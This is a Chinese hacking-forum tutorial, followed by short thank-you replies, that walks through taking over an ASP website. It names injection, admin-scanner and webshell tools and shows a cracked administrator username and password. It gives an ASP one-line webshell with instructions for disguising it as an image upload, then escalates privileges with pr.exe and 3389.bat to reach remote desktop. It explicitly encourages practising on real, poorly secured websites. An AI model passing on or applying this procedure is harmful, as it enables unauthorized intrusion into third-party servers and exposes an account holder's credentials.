下面的这些工具在黑客小密圈里面都有，如果加入小密圈了可以直接在哪里下载，如果没有加入，可以在网上找，网上也可以找到的。

1、找注入 爆账号

啊D和明小子

2、注入工具

椰树扫描、流光、Pangolin（穿山甲）、havij（胡萝卜）

3、找后台

御剑后台扫描、wwwscan扫描器

4、传小马

各种一句话木马、中国菜刀、中国蚁剑

5、提权

pr提权工具、黑协提权工具

接下来就直接渗透一个网站案例，来演示各种工具的使用方法：

实验环境大家可以用虚拟机或者本地进行模拟操作，或者找些漏洞较多，比较垃圾的网站进行操作。

演示开始：

步骤一：找注入

打开浏览器，推荐用火狐浏览器或谷歌浏览器。

出现下图的页面，这里用ie演示。

IE浏览器的选项设置，新手建议全部显示反馈的错误信息，根据实际情况来，就可以准确的判断网页的信息。

直接用啊D注入工具和明小子配合检测使用

成功找到注入点，如下图：

步骤二：爆账号

右键找到的注入点——注入检测

点击右上角的检测开始注入检测

最后得到网站的某个账号，用户名：linhai ，密码：d7e15730ef9708c0

一般来说，数据库存放的密码应该是经过md5加密过的，不用担心，只需要用解密MD5工具一下就可以解密，百度一下，解密工具很多，这里推荐：http://www.dmd5.com

解密md5后得到的密码为：linhai19760812

步骤三：找后台【可以用御剑后台扫描器扫描】

此步骤为找到网站的管理后台。

接下来，访问扫描到的后台地址，登录。

地址：/admin/login.asp

直接登录网站后台，到这里，已经成功获得网站后台管理权限了。

步骤四：传小马

记住黑客入门教程里面的一句话，先传小马，再传大马，找到上传点就不会错，稳拿下。

由于是asp的站点，确定需要的是asp一句话木马，代码为<%eval request("x")%>，密码为x

网站后台的上传点可能很多，有的可行，有的不行，可以多试试，我们的目的就是通过这些上传点，把我们的木马上传到网站服务器，从而控制网站。

通常成功率比较高的上传点是上传图片附件，如下图：

做个木马，打开txt文档，写上asp一句话<%eval request("x")%>，密码是x。并且把文件类型改成图片，不要只写一行代码，不大不小，100行差不多。

然后上传。接下来的思路就是利用网站的数据库功能，把我们上传的文件后缀由jpg改成asp。

然后，就可以用菜刀，连接刚才复制到根目录的xbk.asp文件（木马）。

打开菜刀，在空白处右键——添加，输入木马的地址和网站。

步骤五：拿权限

接下来主要用提权三件套：cmd.exe、pr.exe、3389.bat ，把这3个工具，用菜刀上传到回收站目录下面。接下来，进入我们上传的cmd.exe虚拟终端，执行我们的提权三件套。

不仅仅这种方法可以成功，不同的思路可以转变，或许过程会很顺利，也或者防护很多，没办法顺利入侵成功。

执行完成后，打开远程桌面，用刚才提权的账号，进入服务器。

到此为止，一个完整的渗透过程结束，已经成功获得服务器的管理权限了。

顶你一下，好贴要顶！

不错噢，看看,感谢分享。

不错噢，看看,感谢分享。

谢谢分享 ，虚心学习

谢谢分享 ，虚心学习

这个砖搬的不错。

牛b

学习学习，顺带做任务。